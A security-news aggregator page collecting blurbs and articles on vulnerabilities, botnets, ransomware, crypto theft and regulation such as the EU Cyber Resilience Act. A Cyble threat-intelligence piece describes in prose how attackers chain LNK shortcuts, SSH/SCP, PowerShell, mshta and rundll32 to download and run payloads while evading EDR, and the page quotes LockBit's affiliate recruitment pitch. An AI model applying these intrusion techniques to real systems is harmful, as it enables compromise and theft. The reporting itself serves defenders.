Open Robotics Robot Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered by remotely sending a request to change the value of the dynamic parameter `/amcl odom_frame_id`.

Security News

The latest cybersecurity news, collected from a wide range of security websites.

Learn how to use JSON Web Tokens (JWT) securely in your Node.js applications. I'll cover the basics of JWT and share best practices to avoid common security mistakes.

by Node.js Security

The Cyber Statecraft community and friends offers eight thoughts on the implications of the Salt Typhoon campaign based on what is known to date, what the campaign says about the last four years of cybersecurity policy, and where policymakers should focus in the months ahead. The post The Eight Body Problem: Exploring the Implications of Salt Typhoon appeared first on DFRLab.

by DFRLab

KEY SUMMARY POINTS Krispy Kreme, the beloved doughnut chain, disclosed a data breach on December 11, 2024, in…

by Hackread

Cyberattacks against OT/ICS engineering workstations are widely underestimated, according to researchers who discovered malware designed to shut down Siemens workstation engineering processes.

by Dark Reading

Criminals are luring victims looking to download software and tricking them into running a malicious command.

by Malwarebytes Labs

Fortinet has patched CVE-2023-34990 in its Wireless LAN Manager (FortiWLM), which combined with CVE-2023-48782 could allow for unauthenticated remote code execution (RCE) and the ability to read all log files.

by Dark Reading

The Auto Data Privacy and Autonomy Act would require automakers to create opt-in mechanisms for vehicle data collection and would bar manufacturers from sharing, selling or leasing customer data without explicit consent

by The Record

FHE adoption will be driven by collaboration, open standards, and industry-wide efforts to address privacy and security challenges, including law enforcement's embrace of encryption for national security.

by ITPro Today

With the latest OS versions, you can generate an AirTag link to help airline personnel track down your missing luggage. Apple says privacy safeguards are built in.

by ZDNET Security

Talk in Silicon Valley is focused on agents — artificial intelligence that can handle multistep workplace chores. What does that mean for us?

by ITPro Today

Beginning December 11, customers started reporting “suspicious behavior” on their Session Smart Routers, Juniper says, and they had one thing in common: They were still using the factory-set passwords on the devices.

by The Record

FBI says malware operation is building a botnet out of smart cameras and video boxes.

by SC Media

Threat actors have been observed uploading malicious typosquats of legitimate npm packages such as typescript-eslint and @types/node that have racked up thousands of downloads on the package registry. The counterfeit versions, named @typescript_eslinter/eslint and types-node, are engineered to download a trojan and retrieve second-stage payloads, respectively. "While typosquatting attacks are

by The Hacker News

AI super agents could revolutionize app ecosystems by providing tailored services across platforms, offering a more convenient, user-friendly experience while also transforming app development.

by ITPro Today

Juniper Networks is warning that Session Smart Router (SSR) products with default passwords are being targeted as part of a malicious campaign that deploys the Mirai botnet malware. The company said it's issuing the advisory after "several customers" reported anomalous behavior on their Session Smart Network (SSN) platforms on December 11, 2024. "These systems have been infected with the Mirai

by The Hacker News

2024-12-19 19:02:13

Welcome to the party, pal!

In the last newsletter of the year, Thorsten recalls his tech-savvy gift to his family and how we can all incorporate cybersecurity protections this holiday season.

by Cisco Talos Blog

Cisco Talos’ Vulnerability Research team recently disclosed three out-of-bounds read vulnerabilities in Adobe Acrobat Reader, and two use-after-free vulnerabilities in Foxit Reader. These vulnerabilities exist in Adobe Acrobat Reader and Foxit Reader, two of the most popular and feature-rich PDF readers on the market. The vulnerabilities

by Cisco Talos Blog

Some of the messages in your Gmail inbox this season are not very nice. Google provides guidance on protecting yourself from the naughty ones.

by ZDNET Security

Check Point Software Technologies Ltd. has announced that it has been named as a Leader in the 2024 Gartner® Magic Quadrant™ for Email Security Platforms (ESP). Check Point provides email security through Harmony Email Collaboration, protecting email and collaboration apps from advanced threats, seamlessly integrating with the Check Point Infinity Platform for unified protection. As […] The post Inaugural Gartner Magic Quadrant for Email Security Platforms Names Leading Cyber Orgs appeared first on IT Security Guru.

by IT Security Guru

A newly discovered vulnerability, CVE-2024-53677, in the aging Apache framework is going to cause major headaches for IT teams, since patching isn't enough to fix it.

by Dark Reading

TP-Link is being investigated for alleged predatory pricing practices, which may be driven by ulterior motives.

by Malwarebytes Labs

SandboxAQ have announced a round of more than $300 million from Fred Alger Management, LLC, T. Rowe Price Associates, Inc., Mumtalakat, Parkway Venture Capital, Breyer Capital, Rizvi Traverse, S32, US Innovative Technology Fund, Ava Investments, Eric Schmidt, Marc Benioff, David Siegel, Yann LeCun, IQT, and other prominent investors. The funding round valued the company at […] The post SandboxAQ Announces Over $300 Million of Funding, Valued at $5.3bn appeared first on IT Security Guru.

by IT Security Guru

Modern identity verification (IDV) approaches aim to connect digital credentials and real-world identity without sacrificing usability.

by Dark Reading

Telegram’s “similar channels” feature, introduced last year, recommends extremist channels even when users browse channels on nonpolitical topics such as celebrities or technology, according to a report by the U.S. nonprofit legal advocacy organization Southern Poverty Law Center (SPLC).

by The Record

Non-human identities authenticate machine-to-machine communication. The big challenge now is to secure their elements and processes — before attackers can intercept.

by Dark Reading

Windows 11 officially requires a Trusted Platform Module. Here's what it does and how you can work around that requirement if your old PC doesn't have one.

by ZDNET Security

Cybercriminals are selling hundreds of thousands of credential sets stolen with the help of a cracked version of Acunetix, a powerful commercial web app vulnerability scanner, new research finds. The cracked software is being resold as a cloud-based attack tool by at least two different services, one of which KrebsOnSecurity traced to an information technology firm based in Turkey.

by Krebs on Security

The BadBox Android malware botnet has grown to over 192,000 infected devices worldwide despite a recent sinkhole operation that attempted to disrupt the operation in Germany. [...]

by BleepingComputer

Seemingly innocent "white pages," including an elaborate Star Wars-themed site, are bypassing Google's malvertising filters, showing up high in search results to lure users to second-stage phishing sites.

by Dark Reading

Benchmarking is all about taking back control – you’re measuring to gain complete awareness of your development teams’ security skills and practices. The post How to Implement Impactful Security Benchmarks for Software Development Teams appeared first on SecurityWeek.

by SecurityWeek

The LockBit ransomware group will soon launch a comeback with the planned release of LockBit 4.0 in February 2025, Cyble dark web researchers reported in a note to clients today. The launch of LockBit 4.0 will come almost a year after a global law enforcement action disrupted its operations and led to the recovery of nearly 7,000 decryption keys. RansomHub has since emerged as the most active ransomware group.

The Cyble note to clients included an image of LockBit’s announcement, edited to remove profanity: [Image: LockBit announces plans for LockBit 4.0 release (Source: Cyble)]

“Want a lamborghini, ferrari and lots of ... girls?” the group’s announcement said. “Sign up and start your pentester billionaire journey in 5 minutes with us.”

Can LockBit Make a Comeback?

It remains to be seen if LockBit can successfully mount a comeback after being hit by significant takedowns, arrests and the release of decryption keys. It has been more than two years since the release of LockBit 3.0, and as LockBit was said to be developing the 4.0 version at the time of the law enforcement actions, significant changes likely would have been required if law enforcement obtained access to any source code. Cyble researchers noted that “it is uncertain whether LockBit will regain traction, as the group has faced declining credibility amidst competition from other RaaS groups, such as RansomHub, which currently dominate the ransomware landscape.”

The official release of the LockBit 4.0 Ransomware-as-a-Service (RaaS) program is set for February 3, 2025, Cyble noted, and the group included keys for accessing their dark leak site (DLS).

LockBit 4.0 Will Join Growing RaaS Services

The RaaS model has become increasingly popular with ransomware groups, selling tools, playbooks and infrastructure in exchange for a share of the profits. And with LockBit competing against versions of its own ransomware built on leaked source code, the group appears to face significant hurdles in staging a comeback. Threat researchers will also be watching to see if LockBit changes its targets or regions to avoid attracting international law enforcement attention. A 2022 attack on the Toronto Hospital for Sick Children was particularly ill-advised, and led to an apology from LockBit along with a free decryptor.

by The Cyber Express

2024-12-19 16:01:40

Keepit secures $50M

Proceeds from the latest round will be used to accelerate the company’s growth into key markets such as the United States and Europe, alongside other high-growth regions.

by SC Media

Fortinet has issued an advisory for a now-patched critical security flaw impacting Wireless LAN Manager (FortiWLM) that could lead to disclosure of sensitive information. The vulnerability, tracked as CVE-2023-34990, carries a CVSS score of 9.6 out of a maximum of 10.0. "A relative path traversal [CWE-23] in FortiWLM may allow a remote unauthenticated attacker to read sensitive files," the

by The Hacker News

The flaw circumvents AMD’s Secure Encrypted Virtualization, which encrypts virtual machine memory to safeguard cloud customer data, by tampering with the Serial Presence Detect chip on memory modules using hardware that can cost under $10.

by SC Media

The draft of the long-awaited update to the NCIRP outlines the efforts, mechanisms, involved parties, and decisions the US government will use in response to a large-scale cyber incident.

by Dark Reading

According to the report, such accounts, which often use default passwords and lack proper monitoring -- exposing cloud-native environments to significant risks -- now constitute over 90% of Active Directory identities.

by SC Media

The product, which is now in beta for Rubrik Enterprise Edition and cloud customers, aims to address challenges associated with prolonged business outages during cyberattacks, reducing the traditional recovery timeline from days or weeks to moments.

by SC Media

Microsoft is investigating a known issue randomly triggering "Product Deactivated" errors for customers using Microsoft 365 Office apps. [...]

by BleepingComputer

DeviceTRUST offers solutions that focus on real-time contextual access for virtual desktop infrastructure and desktop as a service, allowing enterprises to secure digital workspaces by continuously monitoring device posture, user location, and other access contexts.

by SC Media

Learn from this real-life scenario where Darktrace detected a ProxyLogon vulnerability and took action to protect Exchange servers. Read more here.

by Darktrace

Employing tactics such as living-off-the-land techniques and targeting both Linux and Windows systems, the group is suspected to include former affiliates of LockBit and BlackCat.

by SC Media

Juniper Networks warns that a Mirai botnet is targeting SSR devices with default passwords after unusual activity was reported on December 11, 2024. Juniper Networks is warning that a Mirai botnet is targeting Session Smart Router (SSR) products with default passwords. Multiple customers reported anomalous activity on their Session Smart Network (SSN) platforms on December […]

by Security Affairs

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Binding Operational Directive (BOD) 25-01, ordering federal civilian agencies to secure their cloud environments and abide by Secure Cloud Business Applications (SCuBA) secure configuration baselines. "Recent cybersecurity incidents highlight the significant risks posed by misconfigurations and weak security controls,

by The Hacker News

Adam Meyers, senior vice president of counter-adversary operations at CrowdStrike says manual attacks, which involve direct interaction with compromised systems rather than relying on malware or automated tools, are gaining traction among cybercriminals for their effectiveness and elusiveness.

by SC Media

A sudden disruption of a major phishing-as-a-service provider leads to the rise of another…that looks very familiar

by Sophos News

$2.2 billion worth of cryptocurrency was stolen from various platforms in 2024, Chainalysis’ 2025 Crypto Crime Report has revealed. Of that sum, $1.34 billion was stolen by North Korea-affiliated hackers, across 47 hacking incidents (out of 303). Most targeted organizations Between 2021 and 2023, decentralized finance (DeFi) platforms were the primary targets of crypto hacks, but in Q2 and Q3 2024, centralized services were the most targeted. Funds stolen between January and November 2024 – … More → The post Cryptocurrency hackers stole $2.2 billion from platforms in 2024 appeared first on Help Net Security.

by Help Net Security

Many people have heard of ChatGPT, Gemini, Bard, Claude, Llama, or other artificial intelligence (AI) assistants at this point. These are all implementations of what are known as large language […] The post Pitting AI Against AI: Using PyRIT to Assess Large Language Models (LLMs) appeared first on Black Hills Information Security.

by Black Hills Information Security

Rostislav Panev, accused of working with the LockBit gang as a developer, has been in Israeli custody since August, and the U.S. wants to extradite him, according to a news report.

by The Record

Sonic, the leading gaming SVM on Solana, and Injective, a WASM-based L1 network, today announced that they will…

by Hackread

A balance of rigorous supplier validation, purposeful data exposure, and meticulous preparation is key to managing and mitigating risk.

by Dark Reading

The Dutch Data Protection Authority (DPA) on Wednesday fined video on-demand streaming service Netflix €4.75 million ($4.93 million) for not giving consumers enough information about how it used their data between 2018 and 2020. An investigation launched by the DPA in 2019 found that the tech giant did not inform customers clearly enough in its privacy statement about what it does with the data

by The Hacker News

The vulnerability, tracked as CVE-2024-44131, was discovered in the FileProvider component and has been fixed in iOS 18, iPadOS 18, and macOS Sequoia 15 through improved validation of symbolic links.

by SC Media

Russia's internet regulator, Roskomnadzor (RKN), has issued a directive requiring Internet Service Providers (ISPs) to supply information that could identify users accessing blocked content via VPNs. The controversial move, part of a broader effort to control digital traffic and combat unauthorized access to restricted sites, has sparked debates over privacy and operational feasibility. The draft … The post Russian Government Orders ISPs to Hand Over Names of VPN Users appeared first on CyberInsider.

by Cyber Insider

Microsoft has acknowledged a critical issue affecting the Auto HDR feature on devices running Windows 11 version 24H2. The feature, designed to enhance gaming visuals by converting SDR (Standard Dynamic Range) content to HDR (High Dynamic Range), may cause games to display incorrect colors or stop responding altogether. The company has implemented a compatibility hold … The post Microsoft Says Auto HDR in Windows 11 24H2 Causes Game Freezes appeared first on CyberInsider.

by Cyber Insider

Researchers at Chainalysis tallied up the known thefts from cryptocurrency platforms in 2024, pegging the total at $2.2 billion, the fifth year in a row that the number topped $1 billion.

by The Record

The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed that a threat actor it tracks as UAC-0125 is leveraging Cloudflare Workers service to trick military personnel in the country into downloading malware disguised as Army+, a mobile app that was introduced by the Ministry of Defence back in August 2024 in an effort to make the armed forces go paperless. Users who visit the

by The Hacker News

GitHub, the premier platform for open-source software collaboration, faces a growing issue of fake star campaigns, which artificially inflate repository popularity metrics. A recent study conducted by researchers from Carnegie Mellon University and North Carolina State University reveals how this trend misleads developers and opens pathways for malware proliferation. Dangers of fake GitHub stars Stars … The post GitHub Plagued by 4.5 Million Fake Stars Problem Misleading Users appeared first on CyberInsider.

by Cyber Insider

The move to urge Americans to use end-to-end encrypted apps comes as China-backed gangs are hacking into phone and internet giants.

by TechCrunch

As threats evolve, SOC teams must adapt their operations. With Cloudflare’s holistic approach to managing user-based risk, SOC teams can operate more efficiently and reduce the likelihood of a breach.

by Cloudflare

With 2025 on the horizon, it’s important to reflect on the developments and various setbacks that happened in cybersecurity this past year. While there have been many improvements in security technologies and growing awareness of emerging cybersecurity threats, 2024 was also a hard reminder that the ongoing fight against cyber criminals is far from over. […] The post 2024 roundup: Top data breach stories and industry trends appeared first on Security Intelligence.

by Security Intelligence

A malicious Android spyware application named 'BMI CalculationVsn' was discovered on the Amazon Appstore, masquerading as a simple health tool but stealing data from infected devices in the background. [...]

by BleepingComputer

Fortinet warns of a patched FortiWLM vulnerability that could allow admin access and sensitive information disclosure. Fortinet warned of a now-patched Wireless LAN Manager (FortiWLM) vulnerability, tracked as CVE-2023-34990 (CVSS score of 9.6), that could lead to admin access and sensitive information disclosure. “A relative path traversal [CWE-23] in FortiWLM may allow a remote, unauthenticated […]

by Security Affairs

In light of recent Chinese hacking into US telecom infrastructure, CISA has released guidance on protecting mobile communications. The post CISA Releases Mobile Security Guidance After Chinese Telecom Hacking appeared first on SecurityWeek.

by SecurityWeek

Learn how continuous threat exposure management (CTEM) boosts cybersecurity with proactive strategies to assess, manage, and reduce risks. The post CTEM Defined: The Fundamentals of Continuous Threat Exposure Management appeared first on NetSPI.

by NetSPI

Protect yourself from sophisticated phishing attacks that leverage Google Calendar to steal your personal information.

by Hackread

Juniper Networks has warned customers of Mirai malware attacks targeting and infecting Session Smart routers using default credentials. [...]

by BleepingComputer

NETSCOUT updates its Arbor Edge Defense (AED) and Arbor Enterprise Manager (AEM) products as part of its Adaptive DDoS Protection Solution to combat AI-enabled DDoS threats and protect critical IT infrastructure. NETSCOUT’s DDoS Threat Intelligence Report noted that application-layer and volumetric attacks have increased by over 43% and 30%, respectively. DDoS-for-hire services have also increased in number and sophistication, making attacks easier to launch. The Cybersecurity & Infrastructure … More → The post NETSCOUT uses AI/ML technology to secure critical IT infrastructure appeared first on Help Net Security.

by Help Net Security

Raccoon Infostealer MaaS operator Mark Sokolovsky was sentenced to 60 months in prison in the US and agreed to pay over $910,000 in restitution. The post Ukrainian Raccoon Infostealer Operator Sentenced to Prison in US appeared first on SecurityWeek.

by SecurityWeek

Alongside the rising adoption and value of crypto assets, theft is also on the rise. This year, the total value of cryptocurrency stolen surged 21%, reaching a substantial $2.2 billion. And according to a Chainalysis report released on Thursday, more than half of this amount was stolen by North Korea-affiliated hacking groups. Earlier this year, […]

by TechCrunch

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a binding operational directive (BOD 25-01) requiring federal civilian agencies to secure their (Microsoft) cloud environments. About the CISA BOD 25-01 directive The Implementing Secure Practices for Cloud Services directive sets out three deadlines for the agencies: By February 21, 2025, they have to identify all cloud tenants within the scope of the directive and report to CISA. By April 25th, 2025, they must deploy … More → The post CISA orders federal agencies to secure their Microsoft cloud environments appeared first on Help Net Security.

by Help Net Security

Cisco has announced its intention to acquire threat detection company SnapAttack to boost Splunk security product capabilities.  The post Cisco to Acquire Threat Detection Company SnapAttack appeared first on SecurityWeek.

by SecurityWeek

Cybercriminals are using advanced techniques to target executives with mobile-specific phishing attacks.

by Hackread

Microsoft has added another Windows 11 24H2 upgrade block for systems with Dirac audio improvement software due to compatibility issues breaking sound output. [...]

by BleepingComputer

Fortinet has disclosed a critical vulnerability in Fortinet Wireless Manager (FortiWLM) that allows remote attackers to take over devices by executing unauthorized code or commands through specially crafted web requests. [...]

by BleepingComputer

In recent years, cyber attackers have continuously upgraded their tactics, exploiting a variety of tools and techniques to evade detection and compromise systems. One such trend that has caught the attention of security experts is the increasing use of malicious LNK files in conjunction with SSH commands. These files, often disguised as legitimate shortcuts, have become an effective weapon in the arsenals of threat actors (TAs), enabling them to infiltrate systems and deploy a wide range of malicious payloads. Cyble Research and Intelligence Labs (CRIL) has closely investigated this rising threat and found that, in 2024, the use of LNK files as an infection vector is on the rise.

The Shift in Attack Vectors: LNK Files as an Entry Point

In its investigation, CRIL identified a trend where attackers are increasingly using LNK files to infiltrate targeted systems. These shortcut files, typically designed to point to a specific application or location on a computer, are often disguised as innocuous documents or files to trick users into executing them. Once opened, they initiate a chain of malicious activities, leading to the deployment of more sophisticated malware and enabling cybercriminals to establish a foothold within the compromised environment. The growing use of LNK files as a delivery mechanism for cyberattacks is part of a broader shift in the tactics employed by threat actors. By leveraging these shortcut files, attackers aim to bypass traditional security defenses, including antivirus programs and endpoint detection and response (EDR) solutions.

Living-Off-the-Land Binaries (LOLBins) and Evasion Techniques

One of the primary techniques utilized by attackers in these LNK-based campaigns is the use of Living-off-the-Land Binaries (LOLBins). These are trusted system binaries that are already present in the operating system and are typically used for legitimate purposes. However, when exploited by cybercriminals, they can serve as powerful tools for executing malicious commands without the need to deploy external malware. In many of these attacks, attackers leverage various LOLBins to download or execute additional malicious payloads, further advancing their attack chain.

While modern EDR solutions are designed to detect suspicious activities involving LOLBins, the sophistication of these attacks continues to evolve. Attackers have refined their methods to bypass detection, making it crucial for organizations to implement more advanced detection mechanisms that can identify malicious use of trusted system utilities.

SSH Commands in Malicious LNK Files: A New Layer of Sophistication

One of the more interesting developments observed in recent campaigns is the incorporation of SSH commands within malicious LNK files. Traditionally used for secure communication between systems, SSH commands have now been weaponized by attackers to establish persistent connections, execute malicious payloads, and maintain control over compromised systems.

CRIL's research has uncovered several campaigns where SSH commands, specifically those using the Secure Copy Protocol (SCP), have been used within LNK files. SCP allows attackers to download malicious files from remote servers to a compromised system, where they are then executed to further the attack. Once the file is downloaded, it is executed, advancing the attacker’s objectives. This technique is particularly concerning because the use of SSH for such operations is not common on Windows systems, allowing the activity to go undetected by traditional security systems.

Exploiting PowerShell and CMD Through SSH

In addition to using SCP for file downloads, threat actors have also employed SSH commands to indirectly execute malicious PowerShell or CMD commands through the LNK file. These commands can be configured to load and execute additional payloads or exploit other system utilities. One such attack observed by CRIL involved a malicious LNK file that used an SSH command to trigger a PowerShell script, which then called mshta.exe to download a malicious payload from a remote URL. The execution of the malicious PowerShell script led to the deployment of a harmful file on the compromised system.

Furthermore, attackers have also leveraged cmd.exe and rundll32 commands to load malicious DLL files and execute them, further complicating detection efforts. In one such case, the attackers used the LNK file to execute a series of commands that ultimately launched a PDF file containing a lure document, which, when opened, triggered the execution of malicious code.

Tactics Employed by Advanced Persistent Threat (APT) Groups

As the sophistication of these attacks continues to grow, APT groups are increasingly incorporating SSH-based techniques into their campaigns. These groups are known for their targeted and long-term cyber espionage activities, and their use of LNK files and SSH commands demonstrates their ongoing refinement of attack methods. Notably, the Transparent Tribe, a well-known APT group, has been linked to the deployment of stealer malware via similar techniques. In these attacks, the malicious payloads are often compiled using Go, making them harder to detect and analyze.

The Need for Vigilance and Enhanced Detection

The combination of LNK files and SSH commands represents a significant threat to organizations worldwide. As attackers continue to refine their methods, it is essential for security teams to implement monitoring strategies and detection systems capable of identifying abnormal activities, such as the malicious use of trusted system binaries. EDR solutions must evolve to detect the subtle signs of malicious SSH and SCP activity, especially in environments where SSH is not typically used. By closely monitoring the legitimate SSH utility and restricting its use to authorized personnel, organizations can reduce the risk of exploitation. Additionally, disabling unnecessary features, such as OpenSSH, on systems where they are not required, can help limit the attack surface.

by The Cyber Express

Europe embarks on a new chapter in cybersecurity with the entry into force of the Cyber Resilience Act (CRA). This marks the first-ever EU legislation addressing cybersecurity across a broad range of digital products. The CRA will have far-reaching implications for everything from simple connected devices like baby monitors and smartwatches to more complex systems supporting critical infrastructure.   With mandatory cybersecurity requirements imposed on manufacturers and retailers, the Act promises to make Europe’s digital space safer, fostering resilience against cyber threats. The Cyber Resilience Act introduces harmonized rules for products containing digital elements, aiming to ensure high levels of cybersecurity standards throughout their entire lifecycle.  This means manufacturers and retailers must meet strict cybersecurity standards at every stage of the product''s journey—from design and production to maintenance and eventual disposal. The goal is to enhance transparency, reduce vulnerabilities, and strengthen overall security for products connected to or interacting with other networks and devices.  The CRA’s requirements apply to all products with digital components, with a few exclusions such as medical devices and aviation equipment. By December 2027, any product sold in the EU containing digital elements will need to meet these cybersecurity standards and bear the CE marking, signifying compliance. The CE marking is a symbol that indicates a product meets EU safety and regulatory standards, and for the first time, it will also assure consumers that the product adheres to stringent cybersecurity measures.  The Cyber Resilience Act (CRA) Will Impact All Economic Operators  The CRA targets all economic operators placing products with digital components on the European market, meaning it applies to manufacturers, importers, and retailers. 
Some of the key factors of the act are:   Additional Guidance for SMEs: Microenterprises and small businesses (SMEs) will receive extra guidance to help them comply with the Cyber Resilience Act (CRA) requirements.  Flexibility for Member States: While the CRA sets minimum cybersecurity standards, Member States have the flexibility to enforce stricter regulations where necessary.  Third-Party Assessments for High-Risk Products: Certain high-risk products, such as firewalls, intrusion detection systems, and cybersecurity tools, will undergo mandatory third-party assessments to ensure compliance with security standards, especially if they are critical to infrastructure or essential services.  Open-Source Software Exemption: Open-source software is not subject to the same strict CRA requirements as commercial products. It is only regulated under the CRA when supplied for commercial use.  Exemption for Non-Commercial Open-Source Software: Software developed by nonprofits or small businesses for non-commercial use is exempt from CRA requirements.  Requirements for Commercial Open-Source Software: Open-source software developed for commercial purposes must adhere to cybersecurity best practices under the CRA. However, it is not required to have a CE marking.  Cybersecurity Standards for Open-Source in Commercial Products: Manufacturers incorporating open-source software into their products must ensure these components meet cybersecurity standards, including regular updates and vulnerability management.  Strengthening Cybersecurity for Critical Infrastructure  The Cyber Resilience Act plays a crucial role in protecting Europe''s critical infrastructure. Digital products used by these services must meet established cybersecurity standards to avoid potential disruption from cyberattacks.   Security of Critical Infrastructure: The CRA ensures that products integrated into critical infrastructure, such as power grids and transportation systems, are secure by default.  
Complementing Existing Regulations: The CRA complements existing regulations like the EU Cybersecurity Strategy and the NIS2 Directive, creating a unified framework for resilience across various sectors.
Sector-Specific Requirements: Some sectors have additional or specific requirements, with existing EU rules on medical devices and vehicles remaining unaffected by the CRA.
Consistency in Radio Equipment Regulations: The cybersecurity of radio equipment will continue to be governed by pre-existing regulations, ensuring consistency within the EU's legislative framework.
Focus on Security Updates and Vulnerability Management: Manufacturers must provide security updates for their products throughout their lifespan, addressing vulnerabilities as they arise.
Support Periods for Products: The CRA mandates at least five years of security updates for most products, with longer support periods required for products with longer lifespans, such as industrial systems or hardware.
Vulnerability Reporting and Fixes: If a vulnerability is discovered, manufacturers must promptly inform users and fix the issue.
Incident Reporting Requirements: If a product's security is compromised, manufacturers must notify relevant authorities and affected users, including mandatory reporting to cybersecurity agencies like ENISA.

Ensuring Transparency and Market Compliance

Transparency is a critical element of the Cyber Resilience Act. The Act mandates that products with digital components must be assessed for conformity, with a special focus on those deemed to be higher risk.

Lifecycle Cybersecurity Assessments: Assessments will verify that products meet cybersecurity requirements throughout their lifecycle, ensuring manufacturers handle vulnerabilities responsibly and products are secure by default.
Market Surveillance and Compliance: The CRA provides a framework for market surveillance authorities to ensure that products meet cybersecurity standards. If a product poses significant cybersecurity risks or fails to comply with regulations, authorities can enforce corrective actions, including recalls or withdrawals.
CE Marking as Compliance Indicator: The CE marking will serve as the primary indicator of a product's compliance with cybersecurity standards, helping consumers make informed purchasing decisions.
Harmonized Standards for Compliance: The CRA encourages the development of harmonized standards to simplify the conformity assessment process. Products meeting these standards will be presumed compliant, streamlining market entry and ensuring consistent security levels across the EU.
Cybersecurity Certifications: The EU Cybersecurity Certification Scheme (EUCC) will be an essential tool for manufacturers to demonstrate compliance with cybersecurity requirements for products sold within the EU.
Role of the European Commission: The Commission will adopt these cybersecurity standards and provide additional technical specifications as needed to support compliance.

Cybersecurity and the Digital Single Market

The CRA plays a pivotal role in the EU's Digital Single Market, which aims to ensure the free flow of digital products and services while maintaining high standards of safety and security. By introducing the CE marking for compliant products, the CRA provides a unified approach that prevents the fragmentation of the digital market. Consumers will have confidence that the digital products they purchase are secure, reducing risks associated with cyberattacks and ensuring the integrity of Europe's digital economy.

In this context, market surveillance authorities will work together to monitor compliance across Member States, while entities like ENISA and CSIRTs (Computer Security Incident Response Teams) will ensure that cybersecurity incidents and vulnerabilities are effectively reported and managed.
As the Cyber Resilience Act transitions into full effect by December 2027, Member States will provide support for small businesses and microenterprises to help them comply with the new cybersecurity requirements. This support could include regulatory sandboxes, training programs, and guidance to reduce the burden of compliance for smaller players in the market.

Additionally, financial aid may be made available to help reduce the costs of third-party conformity assessments, making it easier for smaller manufacturers to meet the high standards of the CRA.

Penalties for Non-Compliance

The Cyber Resilience Act (CRA) enforces penalties for non-compliance, emphasizing the importance of adhering to cybersecurity requirements within the European Union.

Penalties for Non-Compliance: Companies failing to meet the CRA's obligations may face significant fines. Serious violations could result in fines of up to €15 million or 2.5% of the company's worldwide annual turnover from the previous financial year, whichever is higher. For other breaches, fines could reach €10 million or 2% of annual turnover.
Fines for Misleading Information: Providing incorrect, incomplete, or misleading information to market surveillance authorities or notified bodies may incur fines of up to €5 million or 1% of the company's worldwide turnover.
Penalty Structure: The penalties are designed to be effective, proportionate, and dissuasive, ensuring strong deterrents against non-compliance. Market surveillance authorities are responsible for enforcing these penalties and can take actions such as requiring corrective measures, restricting non-compliant products, or removing them from the market.
Role of Member States: Each Member State must establish rules for penalties and enforce them effectively, sharing information with other EU countries as necessary.
Factors in Determining Fines: Authorities will consider factors like the nature and severity of the infringement, its consequences, and the company's size and market share when determining fines.
Combination of Fines and Corrective Actions: Administrative fines may be combined with other corrective measures to ensure that companies comply with cybersecurity standards and protect the digital ecosystem.

How Cyble, the award-winning cybersecurity firm, helps you achieve compliance

The Cyber Resilience Act (CRA) marks an important milestone in enhancing cybersecurity across Europe, solidifying the EU's position as a prominent player in the global effort to secure cyberspace. With mandatory requirements for digital products, a focus on transparency in vulnerability management, and a framework for market surveillance, the CRA ensures the safety and security of Europe's interconnected digital ecosystem.

To better understand the complexities of compliance and upgrade your cybersecurity efforts, Cyble, a leading provider of threat intelligence solutions, offers powerful tools to help organizations be compliance-ready. Cyble's flagship platform, Cyble Vision, utilizes AI, machine learning, and human intelligence to monitor and manage digital risks effectively. With features like continuous deep and dark web monitoring, attack surface management, and real-time alerts, Cyble empowers businesses to identify vulnerabilities, mitigate threats, and maintain compliance with the CRA's stringent requirements.

By integrating Cyble's solutions, organizations can ensure secure products, manage vulnerabilities, and provide timely updates, helping them meet the rigorous cybersecurity standards set by the CRA. Cyble's proactive threat intelligence capabilities and real-time insights enable businesses to protect their digital assets, comply with regulatory obligations, reduce cyberattack risks, and enhance overall resilience in the digital environment.
The post Europe’s Cyber Resilience Act: A New Era of Cybersecurity for Digital Products  appeared first on Cyble.

by CYBLE

Legit Security announced enhancements to its secrets scanning product. Available as either a stand-alone product or as part of a broader ASPM platform, Legit released a new secrets dashboard for an integrated view of all findings and recovery actions taken to remediate secrets. In addition, Legit released new discovery and remediation capabilities for secrets found within developers’ personal GitHub repositories. Secrets – from API keys and tokens to credentials and PII – play a vital … More → The post Legit Security provides insights into the enterprise’s secrets posture appeared first on Help Net Security.

by Help Net Security

Fortinet has released patches for a critical-severity path traversal vulnerability in FortiWLM that was reported last year. The post Fortinet Patches Critical FortiWLM Vulnerability appeared first on SecurityWeek.

by SecurityWeek

Hear from Hostinger's Head of SEO on how its outreach stays focused thanks to Hunter.io.

by The Hunter Blog

Kaspersky's GERT experts describe an incident with initial access to enterprise infrastructures through a FortiClient EMS vulnerability that allowed SQL injections.

by Securelist

McDonald's India exposed the personal information of customers and drivers due to security flaws impacting its APIs.

by TechCrunch

As we step into 2025, the API landscape is undergoing a transformative shift, redefining how businesses innovate and scale. APIs are no longer just enablers of connectivity; they are the architects of ecosystems, powering everything from seamless automation to AI-driven services. The new year will prove to be a pivotal year for the API ecosystem […] The post What could the API Landscape look like in 2025? appeared first on IT Security Guru.

by IT Security Guru

Alphabet spinoff SandboxAQ has announced raising $300 million in funding at a valuation of $5.3 billion. The post SandboxAQ Raises $300 Million at $5.3 Billion Valuation  appeared first on SecurityWeek.

by SecurityWeek

A large-scale cybercriminal operation known as BADBOX is spreading pre-installed malware on Android-based devices, including smartphones, TVs, and tablets, sold through major retailers like Amazon, eBay, and AliExpress. Despite earlier attempts to dismantle the botnet, recent findings from Bitsight indicate that BADBOX remains active and larger than previously thought, compromising over 192,000 devices globally. BADBOX … The post BADBOX Malware Expands Global Reach, Infects 192,000 Devices appeared first on CyberInsider.

by Cyber Insider

Google has released a Chrome 131 update to patch multiple high-severity memory safety vulnerabilities, including three affecting the V8 JavaScript engine. The post Chrome 131 Update Patches High-Severity Memory Safety Bugs appeared first on SecurityWeek.

by SecurityWeek

Microsoft is now blocking Windows 11 24H2 upgrades on systems with Auto HDR enabled due to a compatibility issue that causes game freezes. [...]

by BleepingComputer

As cyber threats continue to evolve, threat actors are refining their techniques and focusing on industries that hold valuable information or play critical roles in society. From ransomware attacks paralyzing operations to data breaches compromising millions of individuals, no sector is immune to cyberattacks. Drawing from recent reports and insights, this blog explores the top 10 industries targeted by cybercriminals in 2024 and the measures they can adopt to bolster their defenses.

1. Government and Public Sector: Custodians of National Security

Government agencies and public sector entities face constant threats, often from nation-state actors seeking strategic advantages or hacktivists with ideological motivations. The sheer volume of citizen data and critical infrastructure managed by these organizations makes them prime targets.

